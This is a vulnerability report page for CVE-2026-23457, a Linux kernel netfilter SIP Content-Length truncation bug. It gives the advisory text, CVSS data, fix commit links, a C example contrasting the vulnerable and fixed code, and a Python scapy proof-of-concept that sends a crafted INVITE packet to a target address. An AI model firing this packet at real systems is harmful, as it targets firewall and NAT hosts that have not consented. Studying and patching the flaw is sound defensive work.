Security Vulnerability Report
CVE-2026-23457 CVSS 8.6 HIGH

CVE-2026-23457

Published: 2026-04-03 16:16:32
Last Modified: 2026-04-27 14:16:34
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

netfilter: nf_conntrack_sip: fix Content-Length u32 truncation in sip_help_tcp()

sip_help_tcp() parses the SIP Content-Length header with simple_strtoul(), which returns unsigned long, but stores the result in unsigned int clen. On 64-bit systems, values exceeding UINT_MAX are silently truncated before computing the SIP message boundary.

For example, Content-Length 4294967328 (2^32 + 32) is truncated to 32, causing the parser to miscalculate where the current message ends. The loop then treats trailing data in the TCP segment as a second SIP message and processes it through the SDP parser.

Fix this by changing clen to unsigned long to match the return type of simple_strtoul(), and reject Content-Length values that exceed the remaining TCP payload length.
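The truncation and the fix described above, as an added C example that is not the kernel's code: it models the message-boundary computation on the commit description only, with strtoul() standing in for simple_strtoul(). The helper names (parse_headers, msg_end_truncated, msg_end_fixed, count_messages) are this example's own, the SIP segment is constructed, and the example assumes an LP64 platform (64-bit Linux) where unsigned long is 64 bits wide.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed TCP segment (not captured traffic): one INVITE whose
 * Content-Length is 2^32 + 32, a 32-byte "body", and a second INVITE
 * behind it. Assumes LP64, where unsigned long is 64 bits. */
static const char SEGMENT[] =
    "INVITE sip:bob@example.invalid SIP/2.0\r\n"
    "Content-Length: 4294967328\r\n"
    "\r\n"
    "AAAAAAAA" "AAAAAAAA" "AAAAAAAA" "AAAAAAAA"   /* exactly 32 bytes */
    "INVITE sip:bob@example.invalid SIP/2.0\r\n"
    "Content-Length: 0\r\n"
    "\r\n";

/* Hypothetical helper: find the end of the header block and the raw
 * Content-Length value. Returns 0 on success, -1 if either is missing. */
static int parse_headers(const char *msg, size_t *body_off, unsigned long *clen)
{
    const char *hdr = strstr(msg, "Content-Length:");
    const char *end = strstr(msg, "\r\n\r\n");

    if (!hdr || !end || hdr > end)
        return -1;
    /* strtoul() stands in for simple_strtoul(): both return unsigned long,
     * so the full 33-bit value survives this call. */
    *clen = strtoul(hdr + strlen("Content-Length:"), NULL, 10);
    *body_off = (size_t)(end - msg) + 4;
    return 0;
}

/* Vulnerable pattern: the unsigned long is stored in an unsigned int, so
 * 4294967328 becomes 32 before the message end is computed. Returns the
 * offset where the parser believes the message ends, or 0 if unparseable. */
size_t msg_end_truncated(const char *msg)
{
    size_t body_off;
    unsigned long parsed;
    unsigned int clen;

    if (parse_headers(msg, &body_off, &parsed) < 0)
        return 0;
    clen = (unsigned int)parsed;   /* the silent truncation */
    return body_off + clen;
}

/* Fixed pattern: keep the full width and reject any Content-Length larger
 * than the bytes actually left in the segment. Returns 0 on rejection. */
size_t msg_end_fixed(const char *msg)
{
    size_t body_off, remaining;
    unsigned long clen;

    if (parse_headers(msg, &body_off, &clen) < 0)
        return 0;
    remaining = strlen(msg) - body_off;
    if (clen > remaining)
        return 0;
    return body_off + clen;
}

typedef size_t (*boundary_fn)(const char *);

/* Walk the segment as a helper loop would, using fn to find each message
 * boundary; returns how many messages the loop would go on to process. */
int count_messages(const char *segment, boundary_fn fn)
{
    size_t off = 0, len = strlen(segment);
    int n = 0;

    while (off < len) {
        size_t end = fn(segment + off);
        if (end == 0 || end > len - off)   /* rejected, unparseable or past the data */
            break;
        n++;
        off += end;
    }
    return n;
}

int main(void)
{
    printf("truncated: message ends at %zu, loop sees %d message(s)\n",
           msg_end_truncated(SEGMENT), count_messages(SEGMENT, msg_end_truncated));
    printf("fixed:     message ends at %zu, loop sees %d message(s)\n",
           msg_end_fixed(SEGMENT), count_messages(SEGMENT, msg_end_fixed));
    return 0;
}
```

With the truncated length the first message appears to end 32 bytes into the body and the loop goes on to parse the second INVITE; with the full-width value and the remaining-payload check the oversized Content-Length is rejected and nothing after it is parsed. Note that a bound check applied after the truncation would not help, since 32 fits comfortably inside the segment; the width of clen has to be fixed first.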

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel (Versions prior to specific commits in stable branches)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
PoC for CVE-2026-23457: Linux Kernel Netfilter SIP Integer Truncation

This script crafts a malicious SIP packet with a Content-Length larger than UINT_MAX.
"""
import sys

from scapy.all import IP, TCP, Raw, send


def send_sip_poc(target_ip, target_port):
    # Content-Length: 2^32 + 32 (4294967328). On 64-bit, this truncates to 32.
    # The parser will read 32 bytes as the body, then process the rest as a new message.
    headers = (
        b"INVITE sip:[email protected] SIP/2.0\r\n"
        b"Via: SIP/2.0/TCP 192.168.1.2:5060;branch=z9hG4bK-poc\r\n"
        b"Max-Forwards: 70\r\n"
        b"To: <sip:[email protected]>\r\n"
        b"From: <sip:[email protected]>;tag=12345\r\n"
        b"Call-ID: [email protected]\r\n"
        b"CSeq: 1 INVITE\r\n"
        b"Contact: <sip:[email protected]>\r\n"
        b"Content-Type: application/sdp\r\n"
        b"Content-Length: 4294967328\r\n"
        b"\r\n"
    )
    body = b"A" * 32  # Data consumed by the truncated length
    trailing = (
        b"INVITE sip:[email protected] SIP/2.0\r\n"  # Data parsed as new message
        b"Content-Length: 0\r\n\r\n"
    )
    payload = headers + body + trailing

    packet = IP(dst=target_ip) / TCP(dport=target_port, sport=5060, flags="PA") / Raw(load=payload)
    send(packet, verbose=1)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(f"Usage: {sys.argv[0]} <target_ip> <target_port>")
        sys.exit(1)
    send_sip_poc(sys.argv[1], int(sys.argv[2]))
```

References

Fix commits in the stable branches (taken from the raw record below):

https://git.kernel.org/stable/c/528b4509c9dfc272e2e92d811915e5211650d383
https://git.kernel.org/stable/c/75fcaee5170e7dbbee778927134ef2e9568b4659
https://git.kernel.org/stable/c/865dba58958c3a86786f89a501971ab0e3ec6ba9
https://git.kernel.org/stable/c/b75209debb9adab287b3caa982f77788c1e15027
https://git.kernel.org/stable/c/cd1b7403ec835f8a0b3f1f7e68ac26af2cb1e42f
https://git.kernel.org/stable/c/d4f17256544cc37f6534a14a27a9dec3540c2015
https://git.kernel.org/stable/c/ed81b6a7012485acdb9c6c80735a0b7d8e5e1873
https://git.kernel.org/stable/c/fbce58e719a17aa215c724473fd5baaa4a8dc57c

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-23457", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-03T16:16:32.473", "lastModified": "2026-04-27T14:16:34.210", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_conntrack_sip: fix Content-Length u32 truncation in sip_help_tcp()\n\nsip_help_tcp() parses the SIP Content-Length header with\nsimple_strtoul(), which returns unsigned long, but stores the result in\nunsigned int clen. On 64-bit systems, values exceeding UINT_MAX are\nsilently truncated before computing the SIP message boundary.\n\nFor example, Content-Length 4294967328 (2^32 + 32) is truncated to 32,\ncausing the parser to miscalculate where the current message ends. The\nloop then treats trailing data in the TCP segment as a second SIP\nmessage and processes it through the SDP parser.\n\nFix this by changing clen to unsigned long to match the return type of\nsimple_strtoul(), and reject Content-Length values that exceed the\nremaining TCP payload length."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "references": [{"url": "https://git.kernel.org/stable/c/528b4509c9dfc272e2e92d811915e5211650d383", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/75fcaee5170e7dbbee778927134ef2e9568b4659", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/865dba58958c3a86786f89a501971ab0e3ec6ba9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/b75209debb9adab287b3caa982f77788c1e15027", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/cd1b7403ec835f8a0b3f1f7e68ac26af2cb1e42f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/d4f17256544cc37f6534a14a27a9dec3540c2015", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/ed81b6a7012485acdb9c6c80735a0b7d8e5e1873", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/fbce58e719a17aa215c724473fd5baaa4a8dc57c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}
```